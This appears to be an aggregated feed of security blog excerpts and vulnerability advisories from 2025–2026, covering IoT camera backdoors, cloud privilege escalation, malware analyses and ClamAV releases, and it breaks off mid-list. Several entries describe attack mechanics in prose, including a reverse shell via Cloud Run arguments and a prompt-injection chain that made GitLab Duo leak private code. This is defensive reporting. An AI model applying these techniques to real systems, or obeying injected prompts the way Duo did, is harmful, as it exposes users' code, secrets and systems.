Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription. Incoming SMS and RCS audio attachments received by Google Messages are now automatically decoded with no user interaction. As a result, audio decoders are now in the 0-click attack surface of most Android phones. I've spent a fair bit of time investigating these decoders, first reporting CVE-2025-49415 in the Monkey's Audio codec on Samsung devices. Based on this research, the team reviewed the Dolby Unified Decoder, and Ivan Fratric...
https://projectzero.google/2026/01/pixel-0-click-part-1.html

When AI Gets Bullied: How Agentic Attacks Are Replaying Human Social Engineering
AI Security Insights – January 2026
https://www.f5.com/labs/articles/when-ai-gets-bullied-how-agentic-attacks-are-replaying-human-social-engineering

Podcast – GirlsTalkCyber – Episode 24
I spoke to the GirlsTalkCyber podcast about understanding and being aware of threats against critical infrastructure. We talked about things you should think about as geopolitical, economic, and climate instability increase across the world and how that relates to cyber threats. https://girlstalkcyber.com/24-what-happens-if-hackers-poison-the-water-interview-with-lesley-carhart/
https://tisiphone.net/2026/01/13/podcast-girlstalkcyber-episode-24/

Smashing Security – 449: How to scam someone in seven days
I am so excited to be on Smashing Security! Such a huge pleasure to finally make it onto one my favorite podcasts of all time with Graham Cluley! While I spoke about the jobs market and what students and hiring managers should be doing about it, Graham told me that my star sign isn’t good […]
https://tisiphone.net/2026/01/07/smashing-security-449-how-to-scam-someone-in-seven-days/

Backdoors in VStarcam cameras
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password. So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer's passwords. A reminder: “P2P”...
https://palant.info/2026/01/07/backdoors-in-vstarcam-cameras/

Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
Understanding mDL credential formats Standards in the VDC Ecosystem In our first blog post in this series, we highlighted that VDCs can represent a wide range of credentials, from a driver's license to a diploma to proof of age. The ability to use VDCs in a wide variety of use cases is a major reason why many are looking at the VDC ecosystem as technology that can change how we present identity and attributes (both in person and online). While credential variety is a good thing, interoperability requires a common set of standards and protocols for issuing, using, and verifying VDCs. The next
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-0

Analysis of PPPP “encryption”
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”: Keys are static and usually trivial to extract from the app. No matter how long the original key, it is mapped to an effective key that's merely four bytes long. The “encryption” is extremely susceptible to known-plaintext attacks, usually allowing reconstruction of the effective key from a single encrypted packet. So this thing is completely broken, why look any further? There is at least one situation where you don't know the app being used so you cannot extract the key and you don't have any traffic to analyze either. It's when you are trying to scan your local network for potential hidden cameras. This script will currently only work for cameras using plaintext communication....
https://palant.info/2026/01/05/analysis-of-pppp-encryption/

My Top 5 Recommendations on OT Cybersecurity Student Upskilling
I get asked about where to start learning OT cybersecurity as a student a lot. I fully realize that attention spans are short and people are busy, so without further ado let’s get to my top five recommendations: I hope this gives you a few more ideas! Happy new year!
https://tisiphone.net/2026/01/04/my-top-5-recommendations-on-ot-cybersecurity-student-upskilling/

Destination Cyber Podcast on OT
Please see my recent podcast on OT foundations and current events with Destination Cyber from KBI.FM!
https://tisiphone.net/2026/01/04/destination-cyber-podcast-on-ot/

ClamAV Signature Retirement
As per our previous announcement, ClamAV file signature retirement has been implemented. Users may notice that file sizes are much smaller today as a result of the signature retirements. After we retired impacted signatures, our download file sizes are now: bytecode.cvd: 275 KiB; main.cvd: 85 MiB; daily.cvd: 22 MiB. Our team is continuing to monitor alerts and the current threat landscape, and we are committed to reintroducing retired signatures as needed. For more detailed information on the ClamAV signature retirement, please see our previous blog post: ClamAV Signature Retirement Announcement. If you have any questions, please join our ClamAV mailer here: ClamAV contact. Or our ClamAV Discord Server here: ClamAV Discord Server.
https://blog.clamav.net/2025/12/clamav-signature-retirement.html

Welcome to the new Project Zero Blog
While on Project Zero, we aim for our research to be leading-edge, our blog design was … not so much. We welcome readers to our shiny new blog! For the occasion, we asked members of Project Zero to dust off old blog posts that never quite saw the light of day. And while we wish we could say the techniques they cover are no longer relevant, there is still a lot of work that needs to be done to protect users against zero days. Our new blog will continue to shine a light on the capabilities of attackers and the many opportunities that exist to protect against them. From 2016: Windows Exploitation Techniques: Race conditions with path lookups by James Forshaw From 2017: Thinking Outside The Box by Jann Horn
https://projectzero.google/2025/12/welcome.html

2026 Cybersecurity Predictions
Whatever you think will happen… will happen faster and with more acronyms than ever before.
https://www.f5.com/labs/articles/2026-cybersecurity-predictions

Unpacking VStarcam firmware for fun and profit
One important player in the PPPP protocol business is VStarcam. At the very least they've already accumulated an impressive portfolio of security issues. Like exposing system configuration including access password unprotected in the Web UI (discovered by multiple people independently from the look of it). Or the open telnet port accepting hardcoded credentials (definitely discovered by lots of people independently). In fact, these cameras have been seen used as part of a botnet, likely thanks to some documented vulnerabilities in their user interface. Is that a thing of the past? Are there updates fixing these issues? Which devices can be updated? These questions are surprisingly hard to answer. I found zero information on VStarcam firmware versions, available updates or security fixes....
https://palant.info/2025/12/15/unpacking-vstarcam-firmware-for-fun-and-profit/

HTTPS certificate industry phasing out less secure domain validation methods
Posted by Chrome Root Program Team Secure connections are the backbone of the modern web, but a certificate is only as trustworthy as the validation process and issuance practices behind it. Recently, the Chrome Root Program and the CA/Browser Forum have taken decisive steps toward a more secure internet by adopting new security requirements for HTTPS certificate issuers. These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation. By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security. To allow affected website operators...
http://security.googleblog.com/2025/12/https-certificate-industry-phasing-out.html

Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain
After noticing a spike in detections involving what looked like a movie torrent for One Battle After Another, Bitdefender researchers started an investigation and discovered that it was a complex infection chain. The film, Leonardo DiCaprio's latest, has quickly gained notoriety, making it an attractive lure for cybercriminals seeking to infect as many devices as possible. People often search for the latest movies on the internet, hoping to find a copy of a new release that has just begun its
https://www.bitdefender.com/en-us/blog/labs/fake-leonardo-dicaprio-movie-torrent-agent-tesla-powershell

Further Hardening Android GPUs
Posted by Liz Prucka, Hamzeh Zawawy, Rishika Hooda, Android Security and Privacy Team Last year, Google's Android Red Team partnered with Arm to conduct an in-depth security analysis of the Mali GPU, a component used in billions of Android devices worldwide. This collaboration was a significant step in proactively identifying and fixing vulnerabilities in the GPU software and firmware stack. While finding and fixing individual bugs is crucial, and progress continues on eliminating them entirely, making them unreachable by restricting attack surface is another effective and often faster way to improve security. This post details our efforts in partnership with Arm to further harden the GPU by reducing the driver's attack surface. The Growing Threat: Why GPU Security Matters The Graphics...
http://security.googleblog.com/2025/12/further-hardening-android-gpus.html

CVE-2025-55182 Exploitation Hits the Smart Home
Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally referred to as React2Shell, affects Node.js applications that allow user-supplied JSON data to influence internal JavaScript object structures. When improperly validated, attackers can escalate this into remote command execution through access to process.mainModule.require and, subsequently, child_process.execSync.
https://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home

A NICE Retrospective on Shaping Cybersecurity's Future
Rodney Petersen has served as the Director of NICE at the National Institute for Standards and Technology (NIST) for the past eleven years where his focus has been on advancing cybersecurity education and workforce development. He will be retiring from federal government service at the end of the 2025 calendar year. Prior to his role at NIST, he has worked in various technology policy and leadership roles with EDUCAUSE and the University of Maryland. The NICE program, led by the National Institute of Standards and Technology (NIST) in the U.S. Department of Commerce, has its origins in the
https://www.nist.gov/blogs/cybersecurity-insights/nice-retrospective-shaping-cybersecuritys-future

Fallacy Failure Attack
AI Security Insights for November 2025
https://www.f5.com/labs/articles/fallacy-failure-attack

Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like
Systemic ransomware events in 2025, how Jaguar Land Rover's shutdown exposed Category 3 supply chain risk, with lessons from Toyota, Nissan and Ferrari.
https://www.darknet.org.uk/2025/11/systemic-ransomware-events-in-2025-how-jaguar-land-rover-showed-what-a-category-3-supply-chain-breach-looks-like/

SmbCrawler – SMB Share Discovery and Secret-Hunting
SmbCrawler is a credentialed SMB share crawler for red teams that discovers misconfigured shares and hunts secrets across Windows networks.
https://www.darknet.org.uk/2025/11/smbcrawler-smb-share-discovery-and-secret-hunting/

Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk
Heisenberg Dependency Health Check is a GitHub Action that flags risky or newly introduced dependencies in pull requests using supply-chain signals.
https://www.darknet.org.uk/2025/11/heisenberg-dependency-health-check-github-action-for-supply-chain-risk/

Dark Web Search Engines in 2025 – Enterprise Monitoring, APIs and IOC Hunting
Dark web search engines in 2025 and how enterprises use monitoring, APIs and IOC hunting to detect credential leaks, impersonation and supply chain exposure.
https://www.darknet.org.uk/2025/11/dark-web-search-engines-in-2025-enterprise-monitoring-apis-and-ioc-hunting/

ClamAV Signature Retirement Announcement
ClamAV was first introduced in 2002; since then, the signature set has grown without bound, delivering as many detections as possible to the community. Due to continually increasing database sizes and user adoption, we are faced with significantly increasing costs of distributing the signature set to the community. To address the issue, Cisco Talos has been working to evaluate the efficacy and relevance of older signatures. Signatures which no longer provide value to the community, based on today's security landscape, will be retired. We are making this announcement as an advisory that our first pass of this retirement effort will result in a significant drop in database size for both daily.cvd and main.cvd. Our goal is to ensure that detection content is targeted to currently active threats...
https://blog.clamav.net/2025/11/clamav-signature-retirement-announcement.html

Trusted hosts bypass via SSH
CVSSv3 Score: 1.8 An Improper Privilege Management vulnerability [CWE-269] in FortiOS, FortiProxy and FortiPAM may allow an authenticated administrator to bypass the trusted host policy via a crafted CLI command. Revised on 2026-05-27 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-25-545

mcp-scan – Real-Time Guardrail Monitoring and Dynamic Proxy for MCP Servers
mcp-scan is a dynamic proxy and guardrail monitor for MCP servers, providing real-time traffic inspection and enforcement for agents and tools.
https://www.darknet.org.uk/2025/11/mcp-scan-real-time-guardrail-monitoring-and-dynamic-proxy-for-mcp-servers/

Initial Access Brokers (IAB) in 2025 – From Dark Web Listings to Supply Chain Ransomware Events
Initial access brokers in 2025, how dark web access listings feed ransomware supply chain events like JLR, and what CISOs can do to detect and disrupt them.
https://www.darknet.org.uk/2025/11/initial-access-brokers-iab-in-2025-from-dark-web-listings-to-supply-chain-ransomware-events/

Reconnoitre – Open-Source Reconnaissance and Service Enumeration Tool
Reconnoitre automates network reconnaissance and service enumeration for penetration testers and red teams using structured, repeatable workflows.
https://www.darknet.org.uk/2025/11/reconnoitre-open-source-reconnaissance-and-service-enumeration-tool/

An overview of the PPPP protocol for IoT cameras
My previous article on IoT “P2P” cameras couldn't go into much detail on the PPPP protocol. However, there is already lots of security research on and around that protocol, and I have a feeling that there is way more to come. There are pieces of information on the protocol scattered throughout the web, yet each one approaches it from a very specific, narrow angle. This is my attempt at creating an overview so that other people don't need to start from scratch. While the protocol can in principle be used by any kind of device, it is mostly being used for network-connected cameras. It isn't really peer-to-peer as advertised but rather relies on central servers, yet the protocol allows the bulk of the data to be transferred via a direct connection between the client and the device. It's hard...
https://palant.info/2025/11/05/an-overview-of-the-pppp-protocol-for-iot-cameras/

Passively Downloading Malware Payloads Via Image Caching
Detailing an improved Cache Smuggling technique to turn third-party software into a passive malware downloader.
https://malwaretech.com/2025/10/exif-smuggling.html

ClamAV 1.5.1 patch version published
Today, we are publishing ClamAV 1.5.1. This version has been released shortly after ClamAV 1.5.0 in order to address several significant issues that were identified following its publication. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. ClamAV 1.5.1 is a patch release with the following fixes:
- Fixed a significant performance issue when scanning some PE files.
- Fixed an issue recording file entries from a ZIP archive central directory which resulted in "Heuristics.Limits.Exceeded.MaxFiles" alerts when using the ClamScan --alert-exceeds-max command line option or the ClamD AlertExceedsMax config file option.
- Improved...
https://blog.clamav.net/2025/10/clamav-151-patch-version-published.html

Insertion of Sensitive 2FA Information in logs and debug command
CVSSv3 Score: 2.6 An Insertion of Sensitive Information into Log File vulnerability [CWE-532] in FortiOS may allow an attacker with at least read-only privileges to retrieve sensitive 2FA-related information by observing logs or via a diagnose command. Revised on 2026-06-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-452

ClamAV 1.5.0 released!
ClamAV 1.5.0 is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. IMPORTANT: A major feature of the 1.5 release is a FIPS-mode compatible method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. This feature relies on “.cvd.sign” signature files for the daily, main, and bytecode databases. Freshclam 1.5.0 will download these files, as will the latest version of CVDUpdate. When they are not present, ClamAV will fall back to using the legacy MD5-based RSA signature check. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.5.0.tar.gz" does not require an internet connection to build....
https://blog.clamav.net/2025/10/clamav-150-released.html

Sharpening the Focus on Product Requirements and Cybersecurity Risks: Updating Foundational Activities for IoT Product Manufacturers
Update: The comment period for your feedback on the second public draft of NIST IR 8259 has been extended through December 10, 2025. Over the past few months, NIST has been revising and updating Foundational Activities for IoT Product Manufacturers (NIST IR 8259 Revision 1 Initial Public Draft), which describes recommended pre-market and post-market activities for manufacturers to develop products that meet their customers' cybersecurity needs and expectations. Thank you so much for the thoughtful comments and feedback throughout this process; 400+ participants across industry, consumer
https://www.nist.gov/blogs/cybersecurity-insights/sharpening-focus-product-requirements-and-cybersecurity-risks-updating

Reasonable Expectations for Cybersecurity Mentees
Most of my audience is on the more senior end of the career spectrum. As a result, a lot of my writing about careers is aimed at senior cybersecurity professionals, encouraging managers and experienced practitioners to support the next generation. But that doesn't mean newcomers are free from responsibility in their career journey. If you're […]
https://tisiphone.net/2025/09/24/reasonable-expectations-for-cybersecurity-mentees/

Entra ID actor token validation bug allowing cross-tenant global admin
A critical vulnerability discovered in Microsoft's Entra ID (formerly Azure AD) allowed for cross-tenant access and potential global admin privilege escalation. The flaw was found in the legacy Azure AD Graph API, which improperly validated the originating tenant for undocumented "Actor tokens." An attacker could use a token from their own tenant to authenticate as any user, including Global Admins, in any other tenant. This vulnerability bypassed security policies like Conditional Access. The issue was reported to Microsoft, who deployed a global fix within days.
https://www.cloudvulndb.org/global-admin-entra-id-actor-tokens

More Mozilla User-Agents, Please: a Deep Dive into an Inadvertent Disclosure Scanner
Sensor Intel Series: September 2025 Trends
https://www.f5.com/labs/articles/more-mozilla-user-agents-please-a-deep-dive-into-an-inadvertent-disclosure-scanner

The Top 10 Things I'd Like to See in University OT Cybersecurity Curriculum (2025 Edition)
Most of you who have been following me for a while know that I have a very strange and unusual job in cybersecurity. I’m one of maybe a hundred or so people on earth who does full time incident response and forensics for industrial devices and networks that are hacked. Things like power plants, trains, […]
https://tisiphone.net/2025/09/10/the-top-10-things-id-like-to-see-in-university-ot-cybersecurity-curriculum-2025-edition/

A look at a P2P camera (LookCam app)
I've got my hands on an internet-connected camera and decided to take a closer look, having already read about security issues with similar cameras. What I found far exceeded my expectations: fake access controls, bogus protocol encryption, completely unprotected cloud uploads and firmware riddled with security flaws. One could even say that these cameras are Murphy's Law turned solid: everything that could be done wrong has been done wrong here. While there is considerable prior research on these and similar cameras that outlines some of the flaws, I felt that the combination of severe flaws is reason enough to publish an article of my own. My findings should apply to any camera that can be managed via the LookCam app. This includes cameras meant to be used with less popular apps of the...
https://palant.info/2025/09/08/a-look-at-a-p2p-camera-lookcam-app/

Open Online Mentoring Guide
I’ve had a sign up for open online career mentoring on my site for quite a number of years now (in addition to running similar career clinics in-person). As I’ve gotten more and more traction internationally on the program, a lot of senior folks have asked how to set up a program for office hours […]
https://tisiphone.net/2025/09/01/open-online-mentoring-guide/

Stories Ink Interviewed Me, and I love Stories.
I was recently at the Tech Leaders Summit in Hunter Valley and the inimitable Jennifer O’Brien covered my backstory and how I got into the odd space of Operational Technology. This is a nice change of format for people who aren’t into podcasts and she tells such a good narrative. It was really cool to […]
https://tisiphone.net/2025/09/01/stories-ink-interviewed-me-and-i-love-stories/

Dataform cross-tenant path traversal
Dataform could have allowed a malicious customer to gain unauthorized cross-tenant access to other customers' code repositories and data. By preparing a maliciously crafted package.json file, an attacker could exploit a path traversal vulnerability in the npm package installation process, thereby gaining read and write access in other customers' repositories. According to Google, there was no evidence of exploitation in the wild.
https://www.cloudvulndb.org/dataform-path-traversal

ClamAV 1.5.0 release candidate now available!
The ClamAV 1.5.0 release candidate is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The release candidate phase is expected to last two to four weeks before we publish the stable release. This will depend on whether any changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this release candidate, but we are not...
https://blog.clamav.net/2025/08/clamav-150-release-candidate-now.html

AWS ECS Agent Information Disclosure Vulnerability
A vulnerability in the Amazon ECS agent could allow an introspection server to be accessed off-host. This information disclosure issue, if exploited, could allow another instance in the same security group to access the server's data. The vulnerability does not affect instances where off-host access is set to 'false'. The issue has been patched in version 1.97.1 of the ECS agent.
https://www.cloudvulndb.org/aws-ecs-agent-information-disclosure-vulnerability

IoT Penetration Testing: From Hardware to Firmware
As Internet of Things (IoT) devices continue to permeate every aspect of modern life (homes, offices, factories, vehicles), their attack surfaces have become increasingly attractive to adversaries. The challenge with testing IoT systems lies in their complexity: these devices often combine physical interfaces, embedded firmware, network services, web applications, and companion mobile apps into a [...] The post IoT Penetration Testing: From Hardware to Firmware appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/iot-hacking/iot-penetration-testing-from-hardware-to-firmware/

SparkRAT: Exploiting Architectural Weaknesses in Open-Source Offensive Tools
Persistent trend in open-source offensive tooling & implications for defenders
https://www.f5.com/labs/articles/sparkrat-exploiting-architectural-weaknesses-in-open-source-offensive-tools

Every Reason Why I Hate AI and You Should Too
Maybe it's anti-innovation, maybe it's just avoiding hype. But one thing is clear: I'm completely done with hearing about AI.
https://malwaretech.com/2025/08/every-reason-why-i-hate-ai.html

Let's get Digital! Updated Digital Identity Guidelines are Here!
Today is the day! Digital Identity Guidelines, Revision 4 is finally here...it's been an exciting journey and NIST is honored to be a part of it. What can we expect? Serving as a culmination of a nearly four-year collaborative process that included foundational research, two public drafts, and about 6,000 individual comments from the public, Revision 4 of Special Publication 800-63, Digital Identity Guidelines, intends to respond to the changing digital landscape that has emerged since the last major revision of this suite, published in 2017. The guidelines presented in Revision 4 explain the
https://www.nist.gov/blogs/cybersecurity-insights/lets-get-digital-updated-digital-identity-guidelines-are-here

Reflections from the First Cyber AI Profile Workshop
Thank you to everyone who participated in the Cyber AI Profile Workshop NIST hosted this past April! This work intends to support the cybersecurity and AI communities — and the input you provided during this workshop is critical. We are working to publish a Workshop Summary that captures themes and highlights from the event. In the interim, we would like to share a preview of what we heard. Background on the Cyber AI Profile Workshop (watch the workshop introduction video) As NIST began exploring the idea of a Cyber AI Profile and writing the Cybersecurity and AI Workshop Concept Paper
https://www.nist.gov/blogs/cybersecurity-insights/reflections-first-cyber-ai-profile-workshop

Nine Years and Counting: NICE RAMPS Communities Keep Expanding Opportunities in Cybersecurity Work and Learning
A lot has changed in America's cybersecurity workforce development ecosystem since 2016: employment in cybersecurity occupations has grown by more than 300,000 [1]; the number of information security degrees awarded annually has more than tripled to nearly 35,000 [2]; and a wide array of new technologies and risks have emerged. Five regional cybersecurity workforce partnerships supported by the 2016 RAMPS program pilot, administered by NIST's NICE Program Office, have weathered the changes in cybersecurity and continue to anchor cybersecurity talent networks in their communities to this day
https://www.nist.gov/blogs/cybersecurity-insights/nine-years-and-counting-nice-ramps-communities-keep-expanding

The National Cryptologic Foundation Podcast
It was a real honor to appear on the official podcast of the National Cryptologic Foundation, “Cyber Pulse”. They interview a wide range of intriguing personalities working in the cyber and cryptography space, and asked me a broad range of challenging questions about everything from performing forensics on national critical infrastructure – to my move […]
https://tisiphone.net/2025/06/27/the-national-cryptologic-foundation-podcast/

ClamAV 1.4.3 and 1.0.9 security patch versions published
Today, we are publishing the 1.4.3 and 1.0.9 security patch versions. We have also added Linux aarch64 (aka ARM64) RPM and DEB installer packages for the 1.4 LTS release. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.
1.4.3
ClamAV 1.4.3 is a patch release with the following fixes:
- CVE-2025-20260: Fixed a possible buffer overflow write bug in the PDF file parser that could cause a denial-of-service (DoS) condition or enable remote code execution. This issue only affects configurations where both:
  - The max file-size scan limit is set greater than or equal to 1024MB.
  - The...
https://blog.clamav.net/2025/06/clamav-143-and-109-security-patch.html

F5 Labs Top CWEs & OWASP Top Ten Analysis
We expand our view to include CWE and OWASP, and we also examine the latest overall trends for June 2025.
https://www.f5.com/labs/articles/f5-labs-top-cwes-owasp-top-ten-analysis

Information Disclosure on SSLVPN endpoint
CVSSv3 Score: 3.9 An Exposure of Sensitive Information to an Unauthorized Actor vulnerability [CWE-200] in FortiOS SSL-VPN web-mode may allow an authenticated user to access full SSL-VPN settings via a crafted URL. Revised on 2026-06-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-257

Delving Into the SparkRAT Remote Access Tool
Sensor Intel Series: May 2025 CVE Trends
https://www.f5.com/labs/articles/delving-into-the-sparkrat-remote-access-tool

Remote Prompt Injection in GitLab Duo Leaks Source Code
A remote prompt injection vulnerability in GitLab Duo allowed attackers to steal source code from private projects, manipulate code suggestions, and exfiltrate confidential information. The attack chain involved hidden prompts, HTML injection, and exploitation of Duo's access to private data. GitLab has since patched both the HTML and prompt injection vectors.
https://www.cloudvulndb.org/gitlab-duo-prompt-injection-leak

AWS Security Tool Introduces Privilege Escalation Risk
AWS's Account Assessment for AWS Organizations tool, designed to audit cross-account access, inadvertently introduced privilege escalation risks due to flawed deployment instructions. Customers were encouraged to deploy the tool in lower-sensitivity accounts, creating risky trust paths from insecure environments into highly sensitive ones. This could allow attackers to pivot from compromised development accounts into production and management accounts.
https://www.cloudvulndb.org/aws-security-tool-risk

FreeRTOS and coreSNTP Security Advisories
Security advisories were issued for FreeRTOS and coreSNTP releases containing unintended scripts that could potentially transmit AWS credentials if executed on Linux/macOS. Affected releases have been removed and users are advised to rotate credentials and delete downloaded copies.
https://www.cloudvulndb.org/freertos-coresntp-advisories

Azure AZNFS-mount Utility Root Privilege Escalation
A critical vulnerability in AZNFS-mount utility, preinstalled on Azure HPC/AI images, allowed unprivileged users to escalate privileges to root on Linux machines. The flaw existed in versions up to 2.0.10 and involved a SUID binary. Azure classified it as low severity but fixed it in version 2.0.11.
https://www.cloudvulndb.org/azure-aznfs-mount-privilege-escalation

AWS Default Roles Can Lead to Service Takeover
Research uncovered security flaws in default AWS service roles, granting overly broad permissions like full S3 access. This allows privilege escalation, cross-service access, and potential account compromise across services like SageMaker, Glue, and EMR. Attackers could exploit these roles to manipulate critical assets and move laterally within AWS environments. AWS has since updated default policies and documentation to mitigate risks.
https://www.cloudvulndb.org/aws-default-roles-service-takeover

Google Cloud ConfusedComposer Privilege Escalation Vulnerability
Tenable discovered a privilege escalation vulnerability in Google Cloud Platform's Cloud Composer service, dubbed ConfusedComposer. It allowed users with composer.environments.update permission to escalate privileges to the default Cloud Build service account by injecting malicious PyPI packages. This could grant broad permissions across the victim's GCP project.
https://www.cloudvulndb.org/gcp-confused-composer-vulnerability

Burning Data with Malicious Firewall Rules in Azure SQL
Varonis Threat Labs discovered a vulnerability in Azure SQL Server allowing privileged users to create malicious firewall rules that can delete Azure resources when triggered by admin actions. The exploit involves manipulating rule names via TSQL to inject destructive commands, potentially leading to large-scale data loss in affected Azure accounts.
https://www.cloudvulndb.org/burning-data-azure-sql-firewall

Path Traversal in AWS SSM Agent Plugin ID Validation
A path traversal vulnerability in AWS SSM Agent's ValidatePluginId function allows attackers to create directories and execute scripts in unintended locations on the filesystem. This could lead to privilege escalation or other malicious activities, as files may be written to or executed from sensitive areas of the system with root privileges.
https://www.cloudvulndb.org/aws-ssm-agent-path-traversal

ImageRunner: Privilege Escalation Vulnerability in GCP Cloud Run
An attacker with `run.services.update` and `iam.serviceAccounts.actAs` permissions but without explicit registry access could deploy new revisions of Cloud Run services that pulled private container images stored in the same GCP project. This was possible because Cloud Run uses a service agent with the necessary registry read permissions to retrieve these images, regardless of the caller's access level. By updating a service revision and injecting malicious commands into the container's arguments (e.g., using Netcat for reverse shell access), attackers could extract secrets or run unauthorized code. The flaw stemmed from the Cloud Run service agent's trust model, which did not enforce a separate registry permission check on the deploying identity. Google has since modified this behavior...
https://www.cloudvulndb.org/imagerunner

ClamAV 1.5.0 beta now available!
The ClamAV 1.5.0 beta is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The beta phase is expected to last two to four weeks before we publish the stable release or else publish a release candidate. This will depend on how many changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this beta, but we are not yet distributing the...
https://blog.clamav.net/2025/03/clamav-150-beta-now-available.html

2025 Advanced Persistent Bots Report
Uncovering the true scale of persistent bot activity, and the advanced techniques that bot operators use in order to remain hidden from bot defenses.
https://www.f5.com/labs/articles/2025-advanced-persistent-bots-report

The US Needs A New Cybersecurity Strategy: More Offensive Cyber Operations Isn't It
For a long time Chinese hackers have been operating in the grey area between espionage and warfare. The US has been struggling to defend its networks, but increasing offensive cyber operations is unlikely to help.
https://malwaretech.com/2025/03/the-us-needs-a-new-cybersecurity-strategy.html

Advance notice: End of Life for ClamAV 0.103 database updates
ClamAV version 0.103 will reach its end of life (EOL) for database updates on September 14, 2025. After this date, this version will no longer receive the latest virus definitions. To ensure your systems remain protected, please upgrade to the latest supported version of ClamAV before the end-of-life date. This will provide continued access to essential security updates and features. We recommend that users update to the newest release, ClamAV 1.4 LTS. For users that are unable to upgrade to version 1.4, you may find that ClamAV 1.0 LTS is more suitable. The most recent version of ClamAV can be found on the ClamAV Downloads page, on the ClamAV GitHub Releases page, and through Docker Hub. Information about how to install ClamAV is available in our online documentation. The...
https://blog.clamav.net/2025/03/advance-notice-end-of-life-for-clamav.html

Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/why-critical-mongodb-library-flaws-wont-see-mass-exploitation

Pre-authentication Denial of Service attack in OpenSSH - CVE-2025-26466
CVSSv3 Score: 5.9 CVE-2025-26466: A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packets. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packets, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack. Revised on 2026-05-25 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-25-122

Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail. However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article. Update (2025-02-04): An update to the Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/

ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.
1.4.2
ClamAV 1.4.2 is a patch release with the following fixes:
- CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in: 1.4.2 and 1.0.8. Thank you to OSS-Fuzz for identifying this issue.
1.0.8
ClamAV 1.0.8 is a patch release with the following fixes:
- CVE-2025-20128: ...
https://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html

Malicious extensions circumvent Google's remote code ban
As noted last week, I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in the form of a policy but rather a technical change introduced with Manifest V3. As with most things about Manifest V3, these changes are meant for well-behaving extensions, where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/

Chrome Web Store is a mess
